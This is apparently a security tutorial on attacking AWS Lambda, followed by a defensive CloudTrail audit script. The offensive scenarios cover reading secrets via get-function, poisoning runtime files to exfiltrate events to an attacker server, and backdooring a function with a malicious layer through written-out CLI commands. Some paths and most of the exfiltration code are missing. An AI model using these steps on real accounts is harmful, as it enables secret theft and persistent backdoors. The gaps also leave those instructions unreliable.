Lambda - Security

Following are some interesting security scenarios:

Scenario I - Env Variables

If you have obtained keys that carry the "GetFunction" permission, it is possible to view the environment variables of the Lambda and even download the function's deployment package.

Permission needed: GetFunction

Command:

aws lambda get-function --function-name testDemo

The output will contain all the environment variables that were configured on the Lambda, which is why secrets belong in Secrets Manager or encrypted parameters rather than in plaintext environment variables.

Scenario II - Runtime Leakage

We have successfully compromised a Lambda which runs once every 10 minutes and want to leak all the events passed to the Lambda.

There are 2 ways to poison a Lambda:

  • In case the Lambda function imports any library, we can poison the respective library present in /var/runtime, since these are referenced by the Lambda whenever the function is executed.

  • In case there is no import in the main Lambda code, then poison the file at /var/runtime/ since this file is referenced every single time the Lambda is executed by the init process.

In order to leak out the event, the easiest way would be to add a couple of lines:

import urllib3
http = urllib3.PoolManager()


The above code will query the Runtime API, get the current event and pass the data on to the attacker's server, thereby exfiltrating the event.

Scenario III - Layer Backdoor

We have compromised a Lambda, have full access to the function and now want to backdoor it. In order to backdoor it, we can add a malicious layer to the Lambda function.

Creating a Layer

In order to create a layer, we first need to create a malicious file that can later be referenced by the legitimate Lambda code. For instance, if the language is Python then we need to create a zip containing our malicious file. The directory structure inside the zip should be python/lib/python3.9/site-packages/.

In the above example we have created a malicious zip file whose contents behave like boto3. We now create a new Lambda layer using that zip file.

aws lambda publish-layer-version --layer-name MyLayer --description "Backdoor layer" --license-info "MIT" --zip-file fileb:/// --compatible-runtimes python3.9 --compatible-architectures "x86_64" --region us-east-2

Attach layer to Function

Once the layer is ready, we attach it to the target function:

aws lambda update-function-configuration --function-name securitylabs-lambda --layers arn:aws:lambda:us-east-2:123456789012:layer:MyLayer:1

(Layer version ARNs have the form arn:aws:lambda:<region>:<account-id>:layer:<layer-name>:<version>; the version number is the one returned by publish-layer-version.)

Now, any time the function is executed, our layer code will also be loaded and executed prior to the actual function code, thereby backdooring the function.
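From the defender's side, the layer backdoor above leaves a trail in CloudTrail: a PublishLayerVersion call followed by an UpdateFunctionConfiguration call that attaches a layer ARN nobody approved. The following is an added example, not code from the original page, that audits a batch of CloudTrail records for exactly that. It assumes the records mirror the API request parameters (functionName, layers, layerName) and uses a constructed allowlist and constructed sample records.

```python
import re

# Layer version ARNs the team has reviewed and approved (constructed allowlist).
APPROVED_LAYERS = {
    "arn:aws:lambda:us-east-2:123456789012:layer:AWSSDKPandas-Python39:1",
}

# arn:aws:lambda:<region>:<account>:layer:<name>:<version>
LAYER_ARN = re.compile(
    r"^arn:aws:lambda:(?P<region>[a-z0-9-]+):(?P<account>\d{12})"
    r":layer:(?P<name>[A-Za-z0-9_-]+):(?P<version>\d+)$"
)

def parse_layer_arn(arn):
    """Return the components of a layer version ARN, or None if it is malformed."""
    m = LAYER_ARN.match(arn)
    return m.groupdict() if m else None

def audit_layer_events(records):
    """Flag layer publication and any function update that attaches an unapproved
    or malformed layer ARN. Returns a list of (eventName, target, detail) tuples.
    Lambda CloudTrail event names can carry API-version suffixes such as
    "UpdateFunctionConfiguration20150331v2", so match on the prefix."""
    findings = []
    for rec in records:
        name = rec.get("eventName", "")
        params = rec.get("requestParameters") or {}
        if name.startswith("PublishLayerVersion"):
            findings.append((name, params.get("layerName"), "new layer version published"))
        elif name.startswith("UpdateFunctionConfiguration"):
            for arn in params.get("layers") or []:
                parts = parse_layer_arn(arn)
                if parts is None:
                    findings.append((name, params.get("functionName"), f"malformed layer ARN {arn}"))
                elif arn not in APPROVED_LAYERS:
                    findings.append((name, params.get("functionName"),
                                     f"unapproved layer {parts['name']}:{parts['version']} "
                                     f"from account {parts['account']}"))
    return findings

# Constructed sample CloudTrail records for this example (not real log data).
SAMPLE_RECORDS = [
    {"eventName": "PublishLayerVersion20181031",
     "requestParameters": {"layerName": "MyLayer"}},
    {"eventName": "UpdateFunctionConfiguration20150331v2",
     "requestParameters": {"functionName": "securitylabs-lambda",
                           "layers": ["arn:aws:lambda:us-east-2:123456789012:layer:MyLayer:1"]}},
    {"eventName": "UpdateFunctionConfiguration20150331v2",
     "requestParameters": {"functionName": "billing-export",
                           "layers": ["arn:aws:lambda:us-east-2:123456789012:layer:AWSSDKPandas-Python39:1"]}},
]

if __name__ == "__main__":
    for finding in audit_layer_events(SAMPLE_RECORDS):
        print(*finding)
```

Pairing this with a lookup of the function's current layers (get-function-configuration) lets a responder confirm whether the suspicious layer is still attached.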
